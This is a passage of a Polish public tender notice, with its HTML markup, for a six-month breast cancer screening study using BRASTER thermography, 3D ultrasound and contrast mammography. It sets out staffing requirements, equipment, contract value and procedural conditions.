Wykonawca z uwagi na zakres i rodzaj zamówienia zatrudnił na czas trwania realizacji przedmiotu umowy wystarczającą liczbę osób, tj. Głównego badacza i osoby (minimum 2 osoby) wchodzące w skład Zespołu Interpretatorów, tj.: Kierownika Zespołu oraz minimum jednego Członka Zespołu Interpretatorów, wykonujących ocenę radiologiczną każdego badania, przy czy Zamawiający wymaga aby co najmniej dwie z wyżej wymienionych osób zostały zatrudnione na podstawie umowy o pracę. Wykonawca zobowiązany jest zagwarantować zatrudnienie na powyższych zasadach przez cały okres realizacji przedmiotu zamówienia, przy czym łączny wymiar czasu pracy rzeczonych pracowników ma odpowiadać dwóm etatom - lista osób zatrudnionych na umowę o pracę przy realizacji umowy stanowi Załącznik Nr 4 do umowy.2.2Opis zadań osoby wyznaczonej do pełnienia funkcji Kierownika Zespołu Interpretatorów:a)Kierowanie z Zespołem interpretatorówb)Stały nadzór nad wykonywanymi ocenami termograficznymi i ocenami badania USG 3D, a także w przypadku wykonania mammografii spektralnej i tomosyntezy piersi - w razie wskazań medycznychc)Stała współpraca z działem telemedycznym firmy BRASTER SA2.3Opis zadań osób/y wyznaczonej/ych do pełnienia funkcji Członków zespołu interpretatorów:a)Dokonywanie ocen radiologicznych obrazów termograficznych i obrazów USG 3D, a także w przypadku wykonania mammografii spektralnej i tomosyntezy piersi - w razie wskazań medycznychb)Konsultowanie wszelkich wątpliwości w ocenie badań termograficznych i USG 3D z Kierownikiem Zespołu interpretatorów.2.4 Opis zadań osoby wyznaczonej do pełnienia funkcji Głównego badacza:a)kierowanie zespołem wykształconych i doświadczonych współbadaczy w zakresie realizowanego badania; b)rekrutowanie pacjentek do badania, c)czuwanie nad prawidłowością wykonywania badań aparaturą wykorzystywaną w badaniu; d)podejmowanie decyzji o wykonaniu u pacjentek dodatkowych badań, tj. mammografii spektralnej i tomosyntezay piersi w sytuacji wskazań medycznych; wprowadzanie danych na platformę eCRF 2.5Realizacja zamówienia przez ww. osoby będzie miała na celu podniesienie jakości wykonania zamówienia, większą dyspozycyjność osób wykonujących zamówienie wobec Zamawiającego i Wykonawcy, większe doświadczenie personelu (wynikające ze stałości zatrudnienia u danego Wykonawcy), lepszą kontrolę wykonania zamówienia z uwagi na kierownictwo pracodawcy wynikające ze stosunku pracy, większe zaangażowanie pracowników (wynikające z potrzeby należytego wywiązania się z obowiązków pracowniczych), co przekłada się na utrzymanie zatrudnienia i promowanie aspektów społecznych.2.6Wykonawca w dniu podpisania umowy przedstawi Zamawiającemu dokumenty potwierdzające zatrudnienie co najmniej dwóch osób wskazanych w pkt. 2.1 (np. oświadczenia, zaświadczenia, zanonimizowane umowy o pracę lub inne dokumenty, w tym dokumenty potwierdzające opłacanie składek na ubezpieczenia społeczne i zdrowotne wraz z informacją o liczbie odprowadzonych składek lub dowody potwierdzające zgłoszenie pracownika przez pracodawcę do ubezpieczeń).2.7Wykonawca na każde żądanie Zamawiającego zobowiązany będzie przedstawić bieżące dokumenty potwierdzające, że przedmiot umowy będzie wykonywany przez co najmniej dwie osoby/ę będące/ą pracownikiem/ami, o którym/ch mowa w pkt. 2.1. 2.8 W przypadku niezatrudnienia w trakcie realizacji przedmiotu umowy co najmniej dwóch osób, o których mowa w pkt. 2.1 lub nieprzedstawienia Zamawiającemu na jego żądanie dokumentów poświadczających zatrudnienie co najmniej dwóch osób wskazanych w pkt. 2.1 na umowę o pracę w trakcie realizacji zamówienia, Wykonawca zapłaci Zamawiającemu karę umowną określoną we wzorze umowy. 3.W przypadku, gdy Wykonawca zapowiada zatrudnienie podwykonawców do oferty musi być załączony wykaz z zakresem powierzonych im zadań (części zamówienia), przy czym niedopuszczalne jest podzielenie prac przez podwykonawców dla kolejnych podwykonawców.4.Wykonawca powinien podpisać oraz wypełnić formularz oferty wraz z załącznikami lub złożyć ofertę odpowiadającą ich treści.5.Wykonawca musi dołączyć do oferty wszystkie dokumenty i oświadczenia oraz załączniki przedstawione w SIWZ.</span> <br/> <br/> <b>II.5) Główny kod CPV: </b> <span id="ctl00_ContentPlaceHolder1_cpv_glowny_przedmiot">85121000-3</span> <br/> <b> Dodatkowe kody CPV:</b> <br/> <TABLE style='border: 1px solid black;border-collapse: collapse;'><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Kod CPV</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>85148000-8</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>73000000-2</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>73300000-5</TD></TR></TABLE> <br /> <br /> <b> II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>: <br/> Wartość bez VAT: <span id="ctl00_ContentPlaceHolder1_szacunkowa_wartosc_zamowienia_calosc">357625,50</span> <br/> Waluta: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_waluta_calosc">PLN</span> <br/> <i>(w przypadku umów ramowych lub dynamicznego systemu zakupów - szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i> </div> <br/> <b> II.7) Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7 lub w art. 134 ust. 6 pkt 3 ustawy Pzp: </b> <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zamowien_67">Nie</span> <br/> Określenie przedmiotu, wielkości lub zakresu oraz warunków na jakich zostaną udzielone zamówienia, o których mowa w art. 67 ust. 1 pkt 6 lub w art. 134 ust. 6 pkt 3 ustawy Pzp: <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zamowien_67_tekst"></span> <br/> <b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b> <br /> miesiącach:&#160; <span id="ctl00_ContentPlaceHolder1_okres_w_miesiacach">6</span> &#160;<i> lub </i> <b> dniach:</b> <span id="ctl00_ContentPlaceHolder1_okres_w_dniach"></span> <br /> <i>lub</i> <br /> <b> data rozpoczęcia: </b> <span id="ctl00_ContentPlaceHolder1_data_rozpoczecia"></span> &#160;<i> lub </i><b> zakończenia: </b> <span id="ctl00_ContentPlaceHolder1_data_zakonczenia"></span> <br /> <br/> <b>II.9) Informacje dodatkowe: </b> <span id="ctl00_ContentPlaceHolder1_informacje_na_temat_katalogow">Termin wykonania zamówienia: od dnia udzielenia zamówienia tj. zawarcia umowy do dnia 30.11.2018r. lub do czasu wyczerpania wartości umowy, jeśli nastąpi to przed upływem terminu, na jaki umowa została zawarta. W przypadku zaistnienia możliwości zapłaty przez Zamawiającego faktur wystawionych przez Wykonawcę z terminem płatności w styczniu 2019r., Zamawiający dopuszcza możliwość wydłużenia okresu realizacji przedmiotu zamówienia do 31.12.2018r. w ramach wynagrodzenia umownego brutto. Wykonawca zaś w cenie ryczałtowej oferty uwzględni możliwość wydłużenia realizacji umowy o miesiąc, tj. do 31.12.2018r.</span> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b> III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU </b> <br/> <div style="padding-left: 20px"> <b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_okreslenie_warunkow">Zamawiający nie wyznacza w powyższym zakresie warunku udziału w postępowaniu. </span> <br/> Informacje dodatkowe <span id="ctl00_ContentPlaceHolder1_informacje_dodatkowe_okreslenie_warunkow"></span> <br/> <b>III.1.2) Sytuacja finansowa lub ekonomiczna </b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_sytuacja_finansowa_okreslenie_warunkow">Wykonawca musi znajdować się w sytuacji ekonomicznej lub finansowej pozwalającej, na realizację zamówienia:jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej związanej z przedmiotem zamówienia, przy czym kwota ubezpieczenia jest nie mniejsza niż: 300 000,00 zł (słownie: trzysta tysięcy złotych)Ocena spełnienia warunku będzie dokonywana metodą 0-1, tj.: nie spełnia/spełnia, w oparciu o oświadczenie Wykonawcy zawarte w Załączniku B do formularza oferty oraz przedłożone na wezwanie Zamawiającego aktualne dokumenty potwierdzające, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</span> <br/> Informacje dodatkowe <span id="ctl00_ContentPlaceHolder1_sytuacja_finansowa_informacje_dodatkowe"></span> <br/> <b>III.1.3) Zdolność techniczna lub zawodowa </b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_zdolnosc_techniczna_okreslenie_warunkow">Wykonawca musi posiadać zdolność techniczną i zawodową pozwalającą na realizację zamówienia.1.3.1dysponuje osobami zdolnymi do wykonania zamówienia, posiadające kwalifikacje zawodowe, doświadczenie niezbędne do wykonania zamówienia tj.:1.3.1.1osobą przeznaczoną do pełnienia funkcji Głównego badacza - która posiada wykształcenie i doświadczenie minimum 5 lat w dziedzinie onkologii klinicznej, chirurgii onkologicznej lub ginekologii onkologicznej wykształcenie oraz doświadczenie potwierdzone stosownym dokumentem oraz oświadczeniem, tytuł naukowy co najmniej doktora - poświadczone stosowną dokumentacją; posiada doświadczenie w realizacji minimum dwóch projektów badawczych z wykorzystaniem urządzenia BRASTERTM - weryfikacja na podstawie oświadczenia; posiada certyfikat w zakresie GCP - poświadczone stosowną dokumentacją;1.3.1.2 osobą przeznaczoną do pełnienia funkcji Kierownika Zespołu Interpretatorów posiadającą specjalizację z zakresu radiologii i diagnostyki obrazowej (potwierdzone stosownym dokumentem), doświadczenie minimum 10 lat (poświadczenie na podstawie oświadczenia) w pracy w akredytowanym ośrodku typu Breast Unit (tzn. ośrodku dedykowanym leczeniu kobiet z rakiem piersi; w którym diagnozowanych i leczonych jest co najmniej 150 nowych przypadków raka w skali roku; dysponującym najnowszą aparaturą medyczną; zatrudniającym wielodyscyplinarny zespół specjalistów, w tym chirurgów piersi, radiologów, onkologów, specjalistów od radioterapii, patomorfologów, a także pielęgniarki, psychologów klinicznych, techników RTG oraz rehabilitantów, co umożliwia przeprowadzanie wielodyscyplinarnych konsyliów); oraz doświadczenie w pracy w akredytowanym ośrodku typu Breast Unit za granicą minimum 2 lata* warunek dodatkowo punktowany (poświadczenie na podstawie referencji/oświadczenia);1.3.1.3 osobą/ami (minimum 1 osoba), które będą uczestniczyć w wykonywaniu zamówienia, pełniące funkcję Członków Zespołu Interpretatorów posiadające (lub mające rozpoczętą) specjalizację z zakresu radiologii i diagnostyki obrazowej.1.3.2Dysponuje odpowiednim potencjałem technicznym:Wykonawca przez cały okres realizacji przedmiotu umowy musi posiadać odpowiedni sprzęt zapewniający należyte wykonanie przedmiotu umowy, tj.: a)urządzenie BRASTER (TM) - (1 szt.): to wyrób medyczny klasy IIa, aktywny, nieinwazyjny i przeznaczony do wielokrotnego użytku termograficzny tester kontaktowy do wczesnego wykrywania patologii termicznych, a w szczególności raka piersi u kobiet, wykorzystujący technologię pasywnych matryc ciekłokrystalicznych, umieszczonych w głowicy rejestrującej obraz termograficzny gruczołów piersiowych po przyłożeniu tej matrycy do badanego narządu; urządzenie jest łatwe i intuicyjne w użyciu. Od strony metodologicznej BRASTER(TM) pozwala na wstępne różnicowanie ujawnionych anomalii termicznych ze względu na skojarzone z nimi procesy patofizjologiczneb)urządzenie INVENIA (TM) ABUS - (1 szt.): to urządzenie służące do automatycznej akwizycji ultrasonograficznej 3D gruczołów piersiowych. InveniaTM ABUS (Automated Breast Ultrasound System) to niewytwarzający promieniowania jonizacyjnego aparat uzupełniający diagnostykę przesiewową o trójwymiarowe obrazy ultrasonograficzne szczególnie przydatny u kobiet ze stwierdzoną wysoką gęstością tkanki piersi. Trójwymiarowe, wieloprzekrojowe obrazy pozwalają na dokładną, nieinwazyjną ocenę stadium nowotworu i zaplanowanie zabiegu interwencyjnego dzięki wizualizacji całej tkanki piersi. Obrazy uzyskane za pomocą stacji do obrazowania piersi InveniaTM ABUS są przesyłane do stacji roboczej InveniaTM ABUS do interpretacji, co pozwala na szybki odczyt, a następnie zapis na dysku, w systemie PACS lub na nośniku zewnętrznym. Aparat wyświetla objętości 3D w postaci 2-milimetrowych przekrojów w płaszczyźnie czołowej, w kierunku od tkanki skóry do klatki piersiowejc)urządzenie/a do wykonywania mammografii spektralnej - (1 szt.) *: to urządzenie do wykonywania mammografii spektralnej opiera się na badaniu mammograficznym. W badaniu tym podaje się jodowe środki kontrastowe i wykorzystuje się zależność tłumienia promieniowania rentgenowskiego w zależności od rodzaju substancji zawartych w badanej piersi, szczególnie tkanek miękkich i jodu. Wykonywane są obrazy w akwizycji niskoenergetycznej i akwizycji wysokoenergetycznej. Przez połączenie obrazów niskoenergetycznych i wysokoenergetycznych utworzony zostaje pojedynczy obraz przedstawiający wrażenia rozmieszczenia środka kontrastowego w całej piersi z podkreśleniem unaczynienia zmiany chorobowej. W badaniu tym wykorzystane jest zjawisko subtrakcji, podobnie jak w przypadku rezonansu magnetycznego (MRI). W końcowym efekcie do uzyskania obrazu rozmieszczenia środka kontrastowego niezbędne jest cyfrowe przetwarzanie obrazów. Opisana procedura jest szybka, jednak całkowita dawka promieniowania rentgenowskiego jest wyższa niż dawka dla standardowego badania mammograficznego. Dużą zaletą badania jest możliwość potwierdzenia lub wykluczenia w stosunkowo krótkim czasie wieloogniskowości raka piersid)urządzenie do wykonywania tomosyntezy piersi - (1 szt.) *: to urządzenie do wykonywania tomosyntezy piersi również opiera się na badaniu mammograficznym. Podczas badania urządzenie prześwietla pierś milimetr po milimetrze, wykonywana jest seria zdjęć piersi pod różnymi kątami. Obrazy te są następnie użyte do wygenerowania serii cienkich (1-milimetrowych) warstw, przeglądanych jako zrekonstruowany obraz piersi. W obrazach z tomosyntezą, w porównaniu do obrazów tradycyjnych mammografów 2D, można identyfikować poszczególne struktury, eliminując problem nakładania się ich na siebie. Powstałe obrazy można dowolnie przetwarzać, uzyskując bardzo precyzyjny obraz struktury piersi. Można wykonywać zbliżenia, oddalać oraz powiększać wybrane fragmenty przez co dokładniej oceniać granicę ewentualnych zmian, a przede wszystkim ich lokalizację przestrzenną. Tomosynteza pozwala również na precyzyjne wyłapanie i ocenienie drobnych mikrozwapnień przy jednoczesnym zastosowaniu niskich dawek promieniowania* w przypadku urządzeń wymienionych w lit. c i d Zamawiający dopuszcza dysponowanie 1 urządzeniem pod warunkiem że urządzenie to będzie spełniało cel i funkcję sprzętu opisanego w lit. c i dOcena spełnienia warunku będzie dokonywana metodą 0-1, tj. nie spełnia/spełnia, w oparciu o oświadczenie Wykonawcy zawarte w Załączniku B do Formularza oferty oraz przedłożone na wezwanie Zamawiającego oświadczenie Wykonawcy w postaci Wykazu osób skierowanych do realizacji zamówienia - Załącznik 4 do umowy oraz Wykaz narzędzi - Załącznik 5 do umowy.</span> <br/> Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób: <span id="ctl00_ContentPlaceHolder1_czy_zdolnosc_techniczna_wymaga_wykonawcow">Tak</span> <br/> Informacje dodatkowe: <span id="ctl00_ContentPlaceHolder1_zdolnosc_techniczna_informacje_dodatkowe">Zamawiający wymaga, aby Wykonawca z uwagi na zakres i rodzaj zamówienia zatrudnił na czas trwania realizacji przedmiotu umowy wystarczającą liczbę osób, tj. Głównego badacza i osoby (minimum 2 osoby) wchodzące w skład Zespołu Interpretatorów, tj.: Kierownika Zespołu oraz minimum jednego Członka Zespołu Interpretatorów, wykonujących ocenę radiologiczną każdego badania, przy czy Zamawiający wymaga aby co najmniej dwie z wyżej wymienionych osób zostały zatrudnione na podstawie umowy o pracę. Wykonawca zobowiązany jest zagwarantować zatrudnienie na powyższych zasadach przez cały okres realizacji przedmiotu zamówienia, przy czym łączny wymiar czasu pracy rzeczonych pracowników ma odpowiadać dwóm etatom - lista osób zatrudnionych na umowę o pracę przy realizacji umowy stanowi Załącznik Nr 4 do umowy.</span> </div> <b> III.2) PODSTAWY WYKLUCZENIA </b> <br/> <div style="padding-left: 20px"> <b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1 ustawy Pzp</b> <br/> <b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b> <span id="ctl00_ContentPlaceHolder1_czy_zamawiajacy_przewiduje_wykluczenie">Tak</span> Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia: <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_1">Tak (podstawa wykluczenia określona w art. 24 ust. 5 pkt 1 ustawy Pzp)</span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_2"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_3"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_4"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_5"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_6"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_7"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_8"></span> <br/> </div> <b> III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI </b> <br/> <div style="padding-left: 20px"> <b> Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu </b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_oswiadczenie_niepodleganiu_wykluczenia">Tak</span> <br/> <b> Oświadczenie o spełnianiu kryteriów selekcji </b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_oswiadczenie_spelnienie_kryteriow">Nie</span> </div> <b> III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP: </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_wykaz_dokumentow_zaswiadczen"></span> </div> <b> III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP </b> <br/> <div style="padding-left: 20px"> <b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zakresie_warunkow_udzialu"></span> <br/> <b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zakresie_kryteriow_selekcji"></span> </div> <b> III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_wykaz_potwierdzenie_okolicznosci">1.2.1W celu wykazania braku podstaw do wykluczenia z postępowania, o którym mowa w art. 24 ust. 1 ustawy PZP, oraz w celu potwierdzenia, że spełnia warunki udziału w postępowaniu, Zamawiający przed udzieleniem zamówienia, wezwie Wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym, nie krótszym niż 5 dni, terminie aktualnych na dzień złożenia następujących oświadczeń lub dokumentów:1.2.1.1dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia, 1.2.1.2wykaz osób, skierowanych przez Wykonawcę do realizacji zamówienia publicznego, w szczególności osoby wyznaczonej do pełnienia funkcji Głównego badacza oraz osoby odpowiedzialnej za kierowanie zespołem interpretatorów oraz osób wchodzących w skład zespołu interpretatorów wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami (wypełniony i uzupełniony według wzoru przedstawionego w Załączniku 4 do umowy - Wykaz osób skierowanych do realizacji zamówienia). Jeżeli Wykonawca do pełnienia funkcji Członka/ów Zespołu interpretatorów wyznaczy osoby/ę będącą/e w trakcie specjalizacji to w stosunku do tych osób zobowiązany jest dostarczyć zaświadczenie kierownika specjalizacji o trwającej specjalizacji1.2.1.3	wykaz narzędzi (sprzętu) dostępnych Wykonawcy usługi w celu realizacji zamówienia wraz z informacją o podstawie dysponowania sprzętem (wypełniony i uzupełniony według wzoru przedstawionego w Załączniku 5 do umowy - Wykaz narzędzi;</span> </div> <b> III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6) </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_inne_dokumenty_niewymienione">Wykonawca najpóźniej w dniu podpisania umowy zobowiązany będzie przedstawić Zamawiającemu do wglądu dyplomy, zaświadczenia na potwierdzenie wykształcenia, kwalifikacji ukończonych szkoleń/kursów szkoleń osób uczestniczących przy realizacji zamówienia, a wymienionych przez Wykonawcę w złożonej ofercie w załączniku 4 do umowy - ,,Wykaz osób uczestniczących w realizacji przedmiotu zamówienia" wraz z oświadczeniami i dokumentami potwierdzającymi ich zatrudnienia na umowę o pracę odpowiednio do wymagań opisanych w SIWZ.</span> </div> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA IV: PROCEDURA </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b>IV.1) OPIS </b> <br/> <b>IV.1.1) Tryb udzielenia zamówienia: </b> <span id="ctl00_ContentPlaceHolder1_tryb_udzielenia_zamowienia">Przetarg nieograniczony</span> <br/> <b>IV.1.2) Zamawiający żąda wniesienia wadium:</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wadium">Nie</span> <br/> Informacja na temat wadium <br/> <span id="ctl00_ContentPlaceHolder1_wadium"></span> </div> <br/> <b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zaliczek">Nie</span> <br/> Należy podać informacje na temat udzielania zaliczek: <br/> <span id="ctl00_ContentPlaceHolder1_przewiduje_udzielenie_zaliczek"></span> </div> <br/> <b> IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych: </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wymaga_zlozenie_katalogow_elektronicznych">Nie</span> <br/> Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych: <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_katalogow_elektronicznych">Nie</span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_zlozenie_katalogow_elektronicznych_informacje_dodatkowe"></span> </div> <br/> <b> IV.1.5.) Wymaga się złożenia oferty wariantowej: </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wymaga_zlozenie_oferty_wariantowej">Nie</span> <br/> Dopuszcza się złożenie oferty wariantowej <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_oferty_wariantowej">Nie</span> <br/> Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej: <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_oferty_wariantowej_zasadniczej">Nie</span> </div> <br/> <b> IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu </b> <br/> <i> (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne) </i> <div style="padding-left: 20px"> Liczba wykonawców &#160;<span id="ctl00_ContentPlaceHolder1_liczba_wykonawcow"></span> <br/> Przewidywana minimalna liczba wykonawców <span id="ctl00_ContentPlaceHolder1_minimalna_liczba_wykonawcow"></span> <br/> Maksymalna liczba wykonawców &#160;<span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_wykonawcow"></span> <br/> Kryteria selekcji wykonawców: <br/> <span id="ctl00_ContentPlaceHolder1_znaczenie_warunkow_wykonawcow"></span> </div> <br/> <b> IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów: </b> <div style="padding-left: 20px"> Umowa ramowa będzie zawarta: <br/> <span id="ctl00_ContentPlaceHolder1_z_kim_umowa_bedzie_zawarta"></span> <br/> Czy przewiduje się ograniczenie liczby uczestników umowy ramowej: <br/> <span id="ctl00_ContentPlaceHolder1_czy_ograniczenie_liczby_uczestnikow"></span> <br/> Przewidziana maksymalna liczba uczestników umowy ramowej: <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenie_liczby_uczestnikow"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenie_liczby_uczestnikow_informacje_dodatkowe"></span> <br/> Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_czy_obejmuje_ustanowienie"></span> <br/> Adres strony internetowej, na której będą zamieszczone dodatkowe informacje dotyczące dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_obejmuje_ustanowienie"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_obejmuje_ustanowienie_informacje_dodatkowe"></span> <br/> W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych: <br/> <span id="ctl00_ContentPlaceHolder1_czy_umowy_ramowej_dynamicznego_katalogow"></span> <br/> Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_czy_pobranie_umowy_ramowej_dynamicznego_katalogow"></span> </div> <br/> <b>IV.1.8) Aukcja elektroniczna </b> <br/> <b> Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i> <span id="ctl00_ContentPlaceHolder1_aukcja_elektroniczna">Nie</span> <br/> Należy podać adres strony internetowej, na której aukcja będzie prowadzona: <br/> <span id="ctl00_ContentPlaceHolder1_adres_strony_na_ktorej_bedzie_prowadzona"></span> <br/> <b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b> <span id="ctl00_ContentPlaceHolder1_elementy_aukcji_elektronicznej"></span> <br/> <b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b> <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenia_do_przedstawianych_wartosci"></span> <br/> Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie termin ich udostępnienia: <span id="ctl00_ContentPlaceHolder1_informaje_udostepnione_wykonawcom"></span> <br/> Informacje dotyczące przebiegu aukcji elektronicznej: <span id="ctl00_ContentPlaceHolder1_informaje_przebiegu_aukcji"></span> <br/> Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): <span id="ctl00_ContentPlaceHolder1_warunki_do_licytacji"></span> <br/> Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń: <span id="ctl00_ContentPlaceHolder1_wykorzystanie_sprzetu_elektronicznego"></span> <br/> Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: <span id="ctl00_ContentPlaceHolder1_wymagania_dotyczace_rejestracji_wyk_aukcja"></span> <br/> Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_aukcja_jednoetapowa"></span> <br/>Czas trwania: <span id="ctl00_ContentPlaceHolder1_IV_aukcja_jednoetapowa_czas"></span> <br /> <br/> Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu: <span id="ctl00_ContentPlaceHolder1_IV_aukcja_wykonawcy_zakwalfikowani"></span> <br/> Warunki zamknięcia aukcji elektronicznej: <br/> <span id="ctl00_ContentPlaceHolder1_warunki_zamkniecia_aukcji"></span> </div> <br/> <b>IV.2) KRYTERIA OCENY OFERT </b> <br/> <b>IV.2.1) Kryteria oceny ofert: </b> <br/> <b>IV.2.2) Kryteria</b> <br/> <TABLE style='border: 1px solid black;border-collapse: collapse;'><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Kryteria</TD><TD style='border: 1px solid black;border-collapse: 